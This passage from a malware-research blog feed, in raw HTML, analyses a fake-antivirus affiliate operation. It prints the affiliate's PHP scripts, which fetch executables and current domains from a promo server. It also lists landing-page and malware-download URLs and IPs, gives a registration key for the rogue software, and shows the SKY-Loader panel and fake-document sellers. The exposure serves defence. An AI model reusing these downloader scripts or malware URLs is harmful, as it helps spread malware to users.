/>&nbsp; &nbsp; <span style="color: #000088;">$h</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/fopen" style="color: #000060;"><span style="color: #990000;">fopen</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$fileName</span><span style="color: #339933;">,</span><span style="color: blue;">"w"</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br />&nbsp; &nbsp; <a href="http://www.php.net/fwrite" style="color: #000060;"><span style="color: #990000;">fwrite</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$h</span><span style="color: #339933;">,</span><span style="color: #000088;">$baka_exe</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br />&nbsp; &nbsp; <a href="http://www.php.net/fclose" style="color: #000060;"><span style="color: #990000;">fclose</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$h</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <br />&nbsp; &nbsp; <span style="color: #b1b100;">echo</span> <span style="color: blue;">"OK"</span><span style="color: #339933;">;</span><br /><span style="color: #009900;">}</span><span style="color: #b1b100;">else</span><span style="color: #009900;">{</span><br />&nbsp; &nbsp; my_error<span style="color: #009900;">(</span><span style="color: blue;">"Can't get exe."</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><span style="color: #009900;">}</span> &nbsp; &nbsp; &nbsp; <br /><a href="http://www.php.net/exit" style="color: #000060;"><span style="color: #990000;">exit</span></a><span style="color: #339933;">;</span><br /><span style="color: #666666; font-style: italic;">////////////////////////////////////////////////////////////////////////////////</span><br /><span style="color: black; font-weight: bold;">function</span> my_error<span style="color: #009900;">(</span><span style="color: #000088;">$error_str</span><span style="color: #009900;">)</span><br /><span style="color: #009900;">{</span><br />&nbsp; &nbsp; &nbsp;<span style="color: #b1b100;">echo</span> <span style="color: #009900;">(</span><span style="color: blue;">"Update baka - Error:"</span><span style="color: #339933;">.</span><span style="color: #000088;">$error_str</span><span style="color: #339933;">.</span><span style="color: blue;">"<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>"</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br />&nbsp; &nbsp; &nbsp;<a href="http://www.php.net/exit" style="color: #000060;"><span style="color: #990000;">exit</span></a><span style="color: #339933;">;</span><br /><span style="color: #009900;">}</span><br /><br /><span style="color: black; font-weight: bold;">?&gt;</span></div><br />load2.txt:<br /><div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: black; font-weight: bold;">&lt;?php</span><br /><br /><span style="color: #666666; font-style: italic;">/*<br />&nbsp;* Load2<br />&nbsp;* записает актуальный домен в файл <br />&nbsp;* <br />&nbsp;*/</span><br /><br /><span style="color: #000088;">$fileDomain</span><span style="color: #339933;">=</span><span style="color: blue;">"domain.1"</span><span style="color: #339933;">;</span><br /><span style="color: #000088;">$urlActualDomain</span> <span style="color: #339933;">=</span> <span style="color: blue;">"http://net-wintools.biz/promo/domain/?category=1&amp;api_key=[you_api_key]"</span><span style="color: #339933;">;</span><br /><br /><span style="color: #000088;">$actual_domain</span> <span style="color: #339933;">=</span><a href="http://www.php.net/file" style="color: #000060;"><span style="color: #990000;">file</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$urlActualDomain</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><br /><span style="color: #b1b100;">if</span> <span style="color: #009900;">(</span><a href="http://www.php.net/sizeof" style="color: #000060;"><span style="color: #990000;">sizeof</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$actual_domain</span><span style="color: #009900;">)</span><span style="color: #339933;">==</span> <span style="color: #cc66cc;">0</span> <span style="color: #009900;">)</span> my_error<span style="color: #009900;">(</span><span style="color: blue;">"Can't get domain."</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><br /><span style="color: #000088;">$h</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/fopen" style="color: #000060;"><span style="color: #990000;">fopen</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$fileDomain</span><span style="color: #339933;">,</span><span style="color: blue;">"w"</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><span style="color: #000088;">$text</span><span style="color: #339933;">=</span><a href="http://www.php.net/implode" style="color: #000060;"><span style="color: #990000;">implode</span></a><span style="color: #009900;">(</span><span style="color: blue;">""</span><span style="color: #339933;">,</span> <span style="color: #000088;">$actual_domain</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><a href="http://www.php.net/fwrite" style="color: #000060;"><span style="color: #990000;">fwrite</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$h</span><span style="color: #339933;">,</span><span style="color: blue;">"http://"</span><span style="color: #339933;">.</span><span style="color: #000088;">$text</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><a href="http://www.php.net/fclose" style="color: #000060;"><span style="color: #990000;">fclose</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$h</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><br /><span style="color: #b1b100;">echo</span> <span style="color: blue;">"OK"</span><span style="color: #339933;">;</span><br /><a href="http://www.php.net/exit" style="color: #000060;"><span style="color: #990000;">exit</span></a><span style="color: #339933;">;</span><br /><br /><span style="color: #666666; font-style: italic;">////////////////////////////////////////////////////////////////////////////////</span><br /><span style="color: black; font-weight: bold;">function</span> my_error<span style="color: #009900;">(</span><span style="color: #000088;">$error_str</span><span style="color: #009900;">)</span><br /><span style="color: #009900;">{</span><br />&nbsp; &nbsp; &nbsp;<span style="color: #b1b100;">echo</span> <span style="color: #009900;">(</span><span style="color: blue;">"Update baka - Error:"</span><span style="color: #339933;">.</span><span style="color: #000088;">$error_str</span><span style="color: #339933;">.</span><span style="color: blue;">"<span style="color: #000099; font-weight: bold;">\r</span><span style="color: #000099; font-weight: bold;">\n</span>"</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br />&nbsp; &nbsp; &nbsp;<a href="http://www.php.net/exit" style="color: #000060;"><span style="color: #990000;">exit</span></a><span style="color: #339933;">;</span><br /><span style="color: #009900;">}</span><br /><span style="color: #666666; font-style: italic;">////////////////////////////////////////////////////////////////////////////////</span><br /><span style="color: black; font-weight: bold;">?&gt;</span></div><br />load3.txt<br /><div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: black; font-weight: bold;">&lt;?php</span><br /><span style="color: #666666; font-style: italic;">/* <br />&nbsp;* &nbsp;Load3<br />&nbsp;*&nbsp; дописает к урл ( например /scanner15/?afid=3)<br />&nbsp;*/</span><br /><br /><span style="color: #000088;">$fileName</span><span style="color: #339933;">=</span><span style="color: blue;">"my_file.1"</span><span style="color: #339933;">;</span><br /><span style="color: #000088;">$urlActualDomain</span> <span style="color: #339933;">=</span> <span style="color: blue;">"http://net-wintools.biz/promo/domain/?category=1&amp;api_key=[you_api_key]"</span><span style="color: #339933;">;</span><br /><br /><span style="color: #000088;">$h</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/fopen" style="color: #000060;"><span style="color: #990000;">fopen</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$fileName</span><span style="color: #339933;">,</span><span style="color: blue;">"w"</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><span style="color: #000088;">$text</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/file" style="color: #000060;"><span style="color: #990000;">file</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$urlActualDomain</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><span style="color: #000088;">$text</span><span style="color: #339933;">=</span><a href="http://www.php.net/implode" style="color: #000060;"><span style="color: #990000;">implode</span></a><span style="color: #009900;">(</span><span style="color: blue;">""</span><span style="color: #339933;">,</span> <span style="color: #000088;">$text</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><br /><a href="http://www.php.net/fwrite" style="color: #000060;"><span style="color: #990000;">fwrite</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$h</span><span style="color: #339933;">,</span><span style="color: blue;">"http://"</span><span style="color: #339933;">.</span><span style="color: #000088;">$text</span><span style="color: #339933;">.</span><span style="color: blue;">"/scanner15/?afid=3"</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><a href="http://www.php.net/fclose" style="color: #000060;"><span style="color: #990000;">fclose</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$h</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><span style="color: #b1b100;">echo</span> <span style="color: blue;">"OK"</span><span style="color: #339933;">;</span><br /><a href="http://www.php.net/exit" style="color: #000060;"><span style="color: #990000;">exit</span></a><span style="color: #339933;">;</span><br /><span style="color: black; font-weight: bold;">?&gt;</span></div><br />This Affiliate spread actually <a href="http://xylibox.blogspot.com/2012/03/antivirus-protection-2012.html">Antivirus Protection</a> (<a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&amp;t=75&amp;start=450#p12017">if you want the sample</a>)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-EhIuqpeiKE8/T1fp-y3fOZI/AAAAAAAAFc4/OwSlsvdts3Q/s1600/AntivirusProtection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://2.bp.blogspot.com/-EhIuqpeiKE8/T1fp-y3fOZI/AAAAAAAAFc4/OwSlsvdts3Q/s400/AntivirusProtection.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-sFgz2wgYgow/T1fzDwH-vII/AAAAAAAAFdo/xlZoyX9PnXQ/s1600/ragecomic.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="295" src="http://1.bp.blogspot.com/-sFgz2wgYgow/T1fzDwH-vII/AAAAAAAAFdo/xlZoyX9PnXQ/s400/ragecomic.png" width="400" /></a></div><br />Landing pages:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">• dns: 1 » ip: 31.184.234.89 - adresse: SPACEIN-WEB1.UNI.ME<br />http://spacein-web1.uni.me/monitor10/?www=465<br />http://spacein-web1.uni.me/monitor11/?www=465<br />http://spacein-web1.uni.me/monitor15/?www=465<br /><br />• dns: 1 » ip: 46.21.159.175 - adresse: VIDEO-NKLPC1.TK<br />http://video-nklpc1.tk/xxx2/?www=465<br />http://video-nklpc1.tk/xxx5/?www=465<br /><br />• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ3.TK<br />• dns: 1 » ip: 95.211.128.136 - adresse: UBER-SCANPCXZ4.TK <br />http://uber-scanpcxz3.tk/monitor10/?www=465<br />http://uber-scanpcxz3.tk/monitor11/?www=465<br />http://uber-scanpcxz3.tk/monitor15/?www=465</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-d7su8NP4mmI/T1fucRsmBKI/AAAAAAAAFdA/vHg58ITlIAo/s1600/landing1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-d7su8NP4mmI/T1fucRsmBKI/AAAAAAAAFdA/vHg58ITlIAo/s400/landing1.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-UCNWP12q4wU/T1fugrd55gI/AAAAAAAAFdI/X5AAQLVeKF0/s1600/Landing2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-UCNWP12q4wU/T1fugrd55gI/AAAAAAAAFdI/X5AAQLVeKF0/s400/Landing2.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-RU62ZAJpG7A/T1fumf3mtUI/AAAAAAAAFdQ/LPstpMXW4fA/s1600/Landing3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-RU62ZAJpG7A/T1fumf3mtUI/AAAAAAAAFdQ/LPstpMXW4fA/s400/Landing3.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-9qxjkciWNKg/T1fuqkhyZ0I/AAAAAAAAFdY/Oys6TGmKd2U/s1600/Landing4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-9qxjkciWNKg/T1fuqkhyZ0I/AAAAAAAAFdY/Oys6TGmKd2U/s400/Landing4.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Psg-HMkLLQI/T1fuwP43NVI/AAAAAAAAFdg/-FqU04Ov_iM/s1600/Landing5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-Psg-HMkLLQI/T1fuwP43NVI/AAAAAAAAFdg/-FqU04Ov_iM/s400/Landing5.PNG" width="400" /></a></div><br />Malware dowload:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">• dns: 1 » ip: 83.149.112.46 - adresse: GOADVANCED-SOFTZ.IN <br />http://goadvanced-softz.in/sis/spch.php?www=465<br />http://goadvanced-softz.in/sis/in/out/465.exe <br /><br />• dns: 1 » ip: 205.204.87.27 - adresse: WHITE-DOGGYSOFT.IN<br />http://white-doggysoft.in/sis/spch.php?www=465 <br />http://white-doggysoft.in/sis/in/out/465.exe<br />http://white-doggysoft.in/soft/loader.exe<br />http://white-doggysoft.in/soft/installer_m.exe</div><br />Also a weird string was found in the promo server: <b>Projects/BakaSoft/wdd2010.com/promo_new/trunk/htdocs</b><br />Maybe it's the same program or maybe he payed the&nbsp; people of BakaSoft and they selled the system.<br /><br />Index Of/<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-1ufmJ_TGO1E/T1oN5TC0qII/AAAAAAAAFeI/iG6Yl5pn0l8/s1600/indexof.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="153" src="http://4.bp.blogspot.com/-1ufmJ_TGO1E/T1oN5TC0qII/AAAAAAAAFeI/iG6Yl5pn0l8/s400/indexof.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5XmOVmEG12k/T1oOP6KJaoI/AAAAAAAAFeQ/R7R-TS2vrQU/s1600/indexof2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="http://2.bp.blogspot.com/-5XmOVmEG12k/T1oOP6KJaoI/AAAAAAAAFeQ/R7R-TS2vrQU/s400/indexof2.PNG" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-417434944384553328?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/fakeav-affiliate-who-spread-zaxar.htmlnoreply@blogger.com (Steven K)2tag:blogger.com,1999:blog-5365964245877416061.post-8568882720096404748Fri, 09 Mar 2012 14:32:00 +00002012-03-09T15:58:06.265+01:00Antivirus ProtectionZaxarAntivirus Protection<img border="0" src="http://3.bp.blogspot.com/-YVe3mcYAKSU/T1fe6zYsywI/AAAAAAAAFbQ/qUwJE00jZ5A/s1600/icons.PNG" /><br /><br />According to <a href="http://siri-urz.blogspot.com/2012/02/antivirus-protection.html">S!Ri</a><br /><b>Antivirus Protection</b> is a fake security software (rogue). It is from the same family as: <b>Security Monitor 2012</b>, <b>Security Solution 2011</b>, <b>Antivirus Antispyware 2011</b>, <b>AntiVirus System 2011</b>, <b>Security Inspector 2010</b>, <b>AntiVirus Studio 2010</b>, <b>Desktop Security 2010</b>, <b>Total PC Defender 2010</b>, <b>Desktop Defender 2010</b>, <b>Contraviro</b>, <b>UnVirex</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-FE_0qrHdfLU/T1fWbOnIaTI/AAAAAAAAFao/wngfYZyeraY/s1600/AntivirusProtection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="http://1.bp.blogspot.com/-FE_0qrHdfLU/T1fWbOnIaTI/AAAAAAAAFao/wngfYZyeraY/s400/AntivirusProtection.PNG" width="400" /></a></div><br />Fake BSoD<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-X7fVXMax1QU/T1fWyxdVi-I/AAAAAAAAFbA/byYMt8ilFPc/s1600/wtf.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-X7fVXMax1QU/T1fWyxdVi-I/AAAAAAAAFbA/byYMt8ilFPc/s400/wtf.PNG" width="400" /></a></div><br />Unpack<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-7wkV3ff6E3o/T1fWhkNW7ZI/AAAAAAAAFaw/jS858_X78lE/s1600/unpacking.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-7wkV3ff6E3o/T1fWhkNW7ZI/AAAAAAAAFaw/jS858_X78lE/s400/unpacking.PNG" width="400" /></a></div><br />Anti<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-jAP4V3r1C34/T1fWq4cL8_I/AAAAAAAAFa4/4iFRddHYWW0/s1600/anti-reverse.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://1.bp.blogspot.com/-jAP4V3r1C34/T1fWq4cL8_I/AAAAAAAAFa4/4iFRddHYWW0/s400/anti-reverse.PNG" width="400" /></a></div><br />Serial<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-HUYLSWYB5Zg/T1flOl8iwfI/AAAAAAAAFbg/jWlzrFI593M/s1600/serial.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://3.bp.blogspot.com/-HUYLSWYB5Zg/T1flOl8iwfI/AAAAAAAAFbg/jWlzrFI593M/s400/serial.PNG" width="400" /></a></div><br />To register (and help removal), copy paste this code: <b style="color: red;">LIC-99D0-1239-KJAS-354S-SQD4-CJKF-KF67-GJ78-FGHK-ZDU6</b><br /><br />Kaspersky Lab Technical Support fail by giving a old serial (did they even debugged the FakeAV?)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-rtLP6EdZe4M/T1fdrayhHYI/AAAAAAAAFbI/c-zCPCIY9XM/s1600/kav_lol.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="297" src="http://3.bp.blogspot.com/-rtLP6EdZe4M/T1fdrayhHYI/AAAAAAAAFbI/c-zCPCIY9XM/s400/kav_lol.png" width="400" /></a></div><br />The following urls were found: <br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">• dns: 1 » ip: 85.17.58.199 - adresse: PRO-BESTMUSIC.US<br />http://pro-bestmusic.us/ea.php?p=12&amp;aid=<br /><br />• dns: 1 » ip: 85.17.58.199 - adresse: FINELABOZP.IN<br />http://finelabozp.in/ea.php?p=1&amp;aid=1<br /><br />• dns: 1 » ip: 195.226.218.138 - adresse: ANTIVIRUSPROTECTION2012.COM<br />http://www.antivirusprotection2012.com/buy/index/1/9B11F1579114D8F08FE8069672F71172<br /><br />• dns: 1 » ip: 184.22.135.174 - adresse: SAFEBILLINGSERVICE.COM<br />http://safebillingservice.com/buy/?affiliate_id=1&amp;machine_id=&amp;product_domain=antivirusprotection2012.com </div><br />Thanks to kyREcon :)<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-8568882720096404748?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/antivirus-protection-2012.htmlnoreply@blogger.com (Steven K)2tag:blogger.com,1999:blog-5365964245877416061.post-8896023842628803558Tue, 06 Mar 2012 22:39:00 +00002012-03-06T23:45:57.044+01:00loaderRev0LtSKY-LoaderSKY-Loader v.1.2SKY-Loader v.1.2Advert:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-_GmGU6i-nCg/T1aA00YclNI/AAAAAAAAFZ4/dueJJ-uM6GM/s1600/06-03-2012+22-23-20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://2.bp.blogspot.com/-_GmGU6i-nCg/T1aA00YclNI/AAAAAAAAFZ4/dueJJ-uM6GM/s400/06-03-2012+22-23-20.png" width="338" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1x_XPnUKdJ8/T1aBSZOTBSI/AAAAAAAAFaA/NT1dH233fNQ/s1600/06-03-2012+22-26-22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="375" src="http://2.bp.blogspot.com/-1x_XPnUKdJ8/T1aBSZOTBSI/AAAAAAAAFaA/NT1dH233fNQ/s400/06-03-2012+22-26-22.png" width="400" /></a></div><br />Fast diagram:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-i8MAWMdPscw/T1aLqzbeD1I/AAAAAAAAFaQ/9eI6Hkj8nik/s1600/revolt.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="397" src="http://2.bp.blogspot.com/-i8MAWMdPscw/T1aLqzbeD1I/AAAAAAAAFaQ/9eI6Hkj8nik/s400/revolt.PNG" width="400" /></a></div><br />That feel when user/password are the one by default.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-wYysHjSxJYQ/T1aCIeDafxI/AAAAAAAAFaI/9DDsF03LPyQ/s1600/06-03-2012+22-30-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="http://1.bp.blogspot.com/-wYysHjSxJYQ/T1aCIeDafxI/AAAAAAAAFaI/9DDsF03LPyQ/s400/06-03-2012+22-30-44.png" width="400" /></a></div><br />Stats:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-m4AXJJ-xcZ0/T1Z-lGKe-KI/AAAAAAAAFZQ/AOxY8nak_0k/s1600/Stat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-m4AXJJ-xcZ0/T1Z-lGKe-KI/AAAAAAAAFZQ/AOxY8nak_0k/s400/Stat.png" width="400" /></a></div><br />Add task:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-P3L_tViStdU/T1Z-uja5BBI/AAAAAAAAFZY/icQZXd6t2fM/s1600/add_task.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-P3L_tViStdU/T1Z-uja5BBI/AAAAAAAAFZY/icQZXd6t2fM/s400/add_task.png" width="400" /></a></div><br />Bots info:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-_msb7mOgY6Q/T1Z-1n6mKlI/AAAAAAAAFZg/0guXl-42V3M/s1600/bot_info.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-_msb7mOgY6Q/T1Z-1n6mKlI/AAAAAAAAFZg/0guXl-42V3M/s400/bot_info.png" width="400" /></a></div><br />Settings:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-klyIQDdN1v8/T1Z-8lmQ6RI/AAAAAAAAFZo/Md0OKJ2Ucts/s1600/settings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-klyIQDdN1v8/T1Z-8lmQ6RI/AAAAAAAAFZo/Md0OKJ2Ucts/s400/settings.png" width="400" /></a></div><br />Help:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-a2wHm7vO0ZU/T1Z_BR5XLuI/AAAAAAAAFZw/VuLP7D9hB-Q/s1600/help.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-a2wHm7vO0ZU/T1Z_BR5XLuI/AAAAAAAAFZw/VuLP7D9hB-Q/s400/help.png" width="400" /></a></div><br />Original malware found in BH EK, Next time don't do DNS Request to the C&amp;C for get a file :þ<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-QA1m_vVZio8/T1aTlaOvXAI/AAAAAAAAFag/HtAAu460Ug0/s1600/06-03-2012+23-44-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="http://3.bp.blogspot.com/-QA1m_vVZio8/T1aTlaOvXAI/AAAAAAAAFag/HtAAu460Ug0/s400/06-03-2012+23-44-59.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Po9WUAQYbR8/T1aR1g5G_LI/AAAAAAAAFaY/IR3_OdNJEY8/s1600/Black_lagoon_wich_side_are_you_on.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://3.bp.blogspot.com/-Po9WUAQYbR8/T1aR1g5G_LI/AAAAAAAAFaY/IR3_OdNJEY8/s640/Black_lagoon_wich_side_are_you_on.PNG" width="370" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-8896023842628803558?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/sky-loader-v12.htmlnoreply@blogger.com (Steven K)0tag:blogger.com,1999:blog-5365964245877416061.post-2230505649964418341Tue, 06 Mar 2012 19:25:00 +00002012-03-06T20:26:43.301+01:00driving licensecar documentsID Cardsfake documentsPlastic servicepassportsPlastic service and fake documentsTo return a little on my previous post, plastic and fake documents are also a business.<br />&nbsp;Example with a guys who do plastic service (he even sell embosser/shiner)<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-QuUUzSVAPtQ/T1Y9jAy3WKI/AAAAAAAAFWo/_1mKGexn1Sg/s1600/asthenic.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="http://4.bp.blogspot.com/-QuUUzSVAPtQ/T1Y9jAy3WKI/AAAAAAAAFWo/_1mKGexn1Sg/s400/asthenic.PNG" width="400" /></a></div><br />Some pictures taken by him:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5ugJycbCr1s/T1Y93pfTNtI/AAAAAAAAFWw/BzSqsMrWqYM/s1600/img00123201101102219.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-5ugJycbCr1s/T1Y93pfTNtI/AAAAAAAAFWw/BzSqsMrWqYM/s400/img00123201101102219.jpg" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-v1piJBPHoJ4/T1Y99LbdCtI/AAAAAAAAFW4/5ugXxy7-mvA/s1600/img00122201101102219.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-v1piJBPHoJ4/T1Y99LbdCtI/AAAAAAAAFW4/5ugXxy7-mvA/s400/img00122201101102219.jpg" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-pmG57SIGkR8/T1Y-JlniCEI/AAAAAAAAFXA/ANtiF5_jMtk/s1600/img00111201101101639.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-pmG57SIGkR8/T1Y-JlniCEI/AAAAAAAAFXA/ANtiF5_jMtk/s400/img00111201101101639.jpg" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-XObD-BLi6_s/T1Y-O_T_EmI/AAAAAAAAFXI/a9hTRMwGk4Q/s1600/img00102201101101626.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://4.bp.blogspot.com/-XObD-BLi6_s/T1Y-O_T_EmI/AAAAAAAAFXI/a9hTRMwGk4Q/s400/img00102201101101626.jpg" width="400" /></a></div><br />A service of fake documents with hologram:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-1OkEyOny_L8/T1ZByf3oEMI/AAAAAAAAFXQ/6Xq7MIDI3mM/s1600/faagbaada.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="395" src="http://4.bp.blogspot.com/-1OkEyOny_L8/T1ZByf3oEMI/AAAAAAAAFXQ/6Xq7MIDI3mM/s400/faagbaada.jpg" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-QdkQW6d81v0/T1ZCneXD4vI/AAAAAAAAFXY/Vmzv8wxOcX4/s1600/eappmaacp.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/-QdkQW6d81v0/T1ZCneXD4vI/AAAAAAAAFXY/Vmzv8wxOcX4/s400/eappmaacp.jpg" width="370" /></a></div><br />Fake passports service by "delfin"<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-1gGKNJN82qI/T1ZMVn47bQI/AAAAAAAAFXo/joOcvtImmMQ/s1600/Fake_passports.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" 